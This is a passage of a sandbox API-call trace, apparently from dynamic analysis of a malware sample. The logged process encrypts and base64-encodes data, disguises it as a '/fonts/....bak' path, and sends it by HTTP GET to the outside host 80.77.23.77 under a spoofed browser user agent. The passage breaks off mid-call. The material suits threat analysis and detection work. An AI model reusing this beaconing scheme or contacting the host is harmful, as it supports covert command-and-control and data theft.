pbData=0x2c59d08*, pdwDataLen=0x11ff074*=0x2, dwBufLen=0x20 | out: pbData=0x2c59d08*, pdwDataLen=0x11ff074*=0x10) returned 1 [0069.157] CryptDestroyKey (hKey=0x77d2f8) returned 1 [0069.157] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) [0069.157] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0069.157] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5b520 [0069.157] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c38 | out: hHeap=0x2860000) returned 1 [0069.158] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b58 | out: hHeap=0x2860000) returned 1 [0069.158] StrTrimA (psz="RjqLycIiOWEhHUdn38dGdTJCs4UupBl44+JxC22XKe2asuLoASD/kWTlB2CPxx5z8UOafMYpcsy3XXWSzGHJhvkLNs7LSzAHtJ7ghaRsGVLCuX+Sm0DDxr+donj/Pf9dF7hUG43DozHnhs+fJhn3Bm83Bn/6v3U74UaFp57HPsHF1oIXNKED1SzwRwiyepklAI2MJ+tLKv048odjwcGh/vlhwUXbSfMuLVZlaPDqNGioFU4Qm1m2wf+X9AIMGj2dpge6b4OxzQdeJrRKLulJCzF5nrAQ5KzWmBMvmgJxych=", pszTrimChars="\r\n=") [0069.158] StrTrimA (in: psz="RjqLycIiOWEhHUdn38dGdTJCs4UupBl44+JxC22XKe2asuLoASD/kWTlB2CPxx5z8UOafMYpcsy3XXWSzGHJhvkLNs7LSzAHtJ7ghaRsGVLCuX+Sm0DDxr+donj/Pf9dF7hUG43DozHnhs+fJhn3Bm83Bn/6v3U74UaFp57HPsHF1oIXNKED1SzwRwiyepklAI2MJ+tLKv048odjwcGh/vlhwUXbSfMuLVZlaPDqNGioFU4Qm1m2wf+X9AIMGj2dpge6b4OxzQdeJrRKLulJCzF5nrAQ5KzWmBMvmgJxych=", pszTrimChars="\r\n=" | out: psz="RjqLycIiOWEhHUdn38dGdTJCs4UupBl44+JxC22XKe2asuLoASD/kWTlB2CPxx5z8UOafMYpcsy3XXWSzGHJhvkLNs7LSzAHtJ7ghaRsGVLCuX+Sm0DDxr+donj/Pf9dF7hUG43DozHnhs+fJhn3Bm83Bn/6v3U74UaFp57HPsHF1oIXNKED1SzwRwiyepklAI2MJ+tLKv048odjwcGh/vlhwUXbSfMuLVZlaPDqNGioFU4Qm1m2wf+X9AIMGj2dpge6b4OxzQdeJrRKLulJCzF5nrAQ5KzWmBMvmgJxych") returned 1 [0069.158] lstrlenA (lpString="RjqLycIiOWEhHUdn38dGdTJCs4UupBl44+JxC22XKe2asuLoASD/kWTlB2CPxx5z8UOafMYpcsy3XXWSzGHJhvkLNs7LSzAHtJ7ghaRsGVLCuX+Sm0DDxr+donj/Pf9dF7hUG43DozHnhs+fJhn3Bm83Bn/6v3U74UaFp57HPsHF1oIXNKED1SzwRwiyepklAI2MJ+tLKv048odjwcGh/vlhwUXbSfMuLVZlaPDqNGioFU4Qm1m2wf+X9AIMGj2dpge6b4OxzQdeJrRKLulJCzF5nrAQ5KzWmBMvmgJxych") returned 299 [0069.158] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5b6e8 [0069.158] _snprintf (_Dest=0x2c5b709, _Count=0x4, _Format="%c%02X") [0069.158] _snprintf (in: _Dest=0x2c5b709, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0069.158] _snprintf (in: _Dest=0x2c5b71d, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0069.158] _snprintf (in: _Dest=0x2c5b75a, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0069.158] _snprintf (in: _Dest=0x2c5b764, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0069.158] _snprintf (in: _Dest=0x2c5b76b, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0069.158] _snprintf (in: _Dest=0x2c5b780, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0069.158] _snprintf (in: _Dest=0x2c5b78e, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0069.158] _snprintf (in: _Dest=0x2c5b7bb, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0069.158] _snprintf (in: _Dest=0x2c5b7cc, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0069.158] _snprintf (in: _Dest=0x2c5b7f0, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0069.159] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b520 | out: hHeap=0x2860000) returned 1 [0069.159] lstrlenA (lpString="RjqLycIiOWEhHUdn38dGdTJCs4UupBl44_2BJxC22XKe2asuLoASD_2FkWTlB2CPxx5z8UOafMYpcsy3XXWSzGHJhvkLNs7LSzAHtJ7ghaRsGVLCuX_2BSm0DDxr_2Bdonj_2FPf9dF7hUG43DozHnhs_2BfJhn3Bm83Bn_2F6v3U74UaFp57HPsHF1oIXNKED1SzwRwiyepklAI2MJ_2BtLKv048odjwcGh_2FvlhwUXbSfMuLVZlaPDqNGioFU4Qm1m2wf_2BX9AIMGj2dpge6b4OxzQdeJrRKLulJCzF5nrAQ5KzWmBMvmgJxych") returned 319 [0069.159] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x167) returned 0x2c5b520 [0069.159] memcpy (in: _Dst=0x2c5b520, _Src=0x2c5b6e8, _Size=0x15 | out: _Dst=0x2c5b520) returned 0x2c5b520 [0069.159] memcpy (in: _Dst=0x2c5b536, _Src=0x2c5b6fd, _Size=0x10 | out: _Dst=0x2c5b536) returned 0x2c5b536 [0069.159] memcpy (in: _Dst=0x2c5b547, _Src=0x2c5b70d, _Size=0xf | out: _Dst=0x2c5b547) returned 0x2c5b547 [0069.159] memcpy (in: _Dst=0x2c5b557, _Src=0x2c5b71c, _Size=0x12 | out: _Dst=0x2c5b557) returned 0x2c5b557 [0069.159] memcpy (in: _Dst=0x2c5b56a, _Src=0x2c5b72e, _Size=0x9 | out: _Dst=0x2c5b56a) returned 0x2c5b56a [0069.159] memcpy (in: _Dst=0x2c5b574, _Src=0x2c5b737, _Size=0x14 | out: _Dst=0x2c5b574) returned 0x2c5b574 [0069.159] memcpy (in: _Dst=0x2c5b589, _Src=0x2c5b74b, _Size=0x13 | out: _Dst=0x2c5b589) returned 0x2c5b589 [0069.159] memcpy (in: _Dst=0x2c5b59d, _Src=0x2c5b75e, _Size=0x16 | out: _Dst=0x2c5b59d) returned 0x2c5b59d [0069.159] memcpy (in: _Dst=0x2c5b5b4, _Src=0x2c5b774, _Size=0xd | out: _Dst=0x2c5b5b4) returned 0x2c5b5b4 [0069.159] memcpy (in: _Dst=0x2c5b5c2, _Src=0x2c5b781, _Size=0x8 | out: _Dst=0x2c5b5c2) returned 0x2c5b5c2 [0069.159] memcpy (in: _Dst=0x2c5b5cb, _Src=0x2c5b789, _Size=0x17 | out: _Dst=0x2c5b5cb) returned 0x2c5b5cb [0069.159] memcpy (in: _Dst=0x2c5b5e3, _Src=0x2c5b7a0, _Size=0xa | out: _Dst=0x2c5b5e3) returned 0x2c5b5e3 [0069.159] memcpy (in: _Dst=0x2c5b5ee, _Src=0x2c5b7aa, _Size=0x11 | out: _Dst=0x2c5b5ee) returned 0x2c5b5ee [0069.159] memcpy (in: _Dst=0x2c5b600, _Src=0x2c5b7bb, _Size=0xc | out: _Dst=0x2c5b600) returned 0x2c5b600 [0069.159] memcpy (in: _Dst=0x2c5b60d, _Src=0x2c5b7c7, _Size=0xb | out: _Dst=0x2c5b60d) returned 0x2c5b60d [0069.159] memcpy (in: _Dst=0x2c5b619, _Src=0x2c5b7d2, _Size=0xe | out: _Dst=0x2c5b619) returned 0x2c5b619 [0069.159] memcpy (in: _Dst=0x2c5b628, _Src=0x2c5b7e0, _Size=0x15 | out: _Dst=0x2c5b628) returned 0x2c5b628 [0069.159] memcpy (in: _Dst=0x2c5b63e, _Src=0x2c5b7f5, _Size=0x10 | out: _Dst=0x2c5b63e) returned 0x2c5b63e [0069.159] memcpy (in: _Dst=0x2c5b64f, _Src=0x2c5b805, _Size=0xf | out: _Dst=0x2c5b64f) returned 0x2c5b64f [0069.159] memcpy (in: _Dst=0x2c5b65f, _Src=0x2c5b814, _Size=0xf | out: _Dst=0x2c5b65f) returned 0x2c5b65f [0069.159] memcpy (in: _Dst=0x2c5b66f, _Src=0x2c5b823, _Size=0x5 | out: _Dst=0x2c5b66f) returned 0x2c5b66f [0069.160] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b6e8 | out: hHeap=0x2860000) returned 1 [0069.160] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b38 | out: hHeap=0x2860000) returned 1 [0069.160] StrTrimA (in: psz="RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych", pszTrimChars="\r\n" | out: psz="RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych") returned 0 [0069.160] lstrlenA (lpString="/fonts/") returned 7 [0069.160] lstrlenA (lpString="RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych") returned 339 [0069.160] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x15b) returned 0x2c59b28 [0069.160] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0069.160] lstrcatA (in: lpString1="/fonts/", lpString2="RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych" | out: lpString1="/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych") returned="/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych" [0069.160] lstrcpyA (in: lpString1=0x2c5b520, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0069.160] lstrcpyA (in: lpString1=0x2c5ad18, lpString2="80.77.23.77" | out: lpString1="80.77.23.77") returned="80.77.23.77" [0069.160] lstrcatA (in: lpString1="80.77.23.77", lpString2="/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych" | out: lpString1="80.77.23.77/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych") returned="80.77.23.77/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych" [0069.160] lstrcatA (in: lpString1="80.77.23.77/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych", lpString2=".bak" | out: lpString1="80.77.23.77/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak") returned="80.77.23.77/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak" [0069.160] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) [0069.160] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c8 [0069.160] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1c4 [0069.160] lstrlenA (lpString="80.77.23.77/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak") returned 361 [0069.160] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x16a) returned 0x2c5b690 [0069.160] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x16a) returned 0x2c5b808 [0069.161] StrChrA (lpStart="80.77.23.77/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak", wMatch=0x2f) returned="/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak" [0069.161] StrChrA (lpStart="80.77.23.77/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak", wMatch=0x3f) returned 0x0 [0069.161] memcpy (in: _Dst=0x2c5b690, _Src=0x2c5ad18, _Size=0xb | out: _Dst=0x2c5b690) returned 0x2c5b690 [0069.161] lstrcpyA (in: lpString1=0x2c5b808, lpString2="/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak" | out: lpString1="/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak") returned="/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak" [0069.161] lstrlenA (lpString="/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak") returned 350 [0069.161] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2bd) returned 0x2c5b980 [0069.161] InternetCanonicalizeUrlA (lpszUrl="/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak", lpszBuffer=0x2c5b980, lpdwBufferLength=0x11ff040, dwFlags=0x0) [0069.161] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak", lpszBuffer=0x2c5b980, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak", lpdwBufferLength=0x11ff040) returned 1 [0069.162] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5b808 | out: hHeap=0x2860000) returned 1 [0069.162] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) [0069.162] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0069.163] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0069.163] ResetEvent (hEvent=0x1c8) returned 1 [0069.163] InternetConnectA (hInternet=0xcc0004, lpszServerName="80.77.23.77", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) [0069.163] InternetConnectA (hInternet=0xcc0004, lpszServerName="80.77.23.77", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0069.163] SetEvent (hEvent=0x1c8) returned 1 [0069.164] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/RjqLycIiOWEhHUdn38dGd/TJCs4UupBl44_2BJ/xC22XKe2asuLoAS/D_2FkWTlB2CPxx5z8U/OafMYpcsy/3XXWSzGHJhvkLNs7LSzA/HtJ7ghaRsGVLCuX_2BS/m0DDxr_2Bdonj_2FPf9dF7/hUG43DozHnhs_/2BfJhn3B/m83Bn_2F6v3U74UaFp57HPs/HF1oIXNKED/1SzwRwiyepklAI2MJ/_2BtLKv048od/jwcGh_2Fvlh/wUXbSfMuLVZlaP/DqNGioFU4Qm1m2wf_2BX9/AIMGj2dpge6b4Oxz/QdeJrRKLulJCzF5/nrAQ5KzWmBMvmgJ/xych.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0069.164] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0069.164] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0069.164] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0069.164] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0069.164] ResetEvent (hEvent=0x1c8) returned 1 [0069.164] ResetEvent (hEvent=0x1c4) returned 1 [0069.164] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) [0069.164] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, 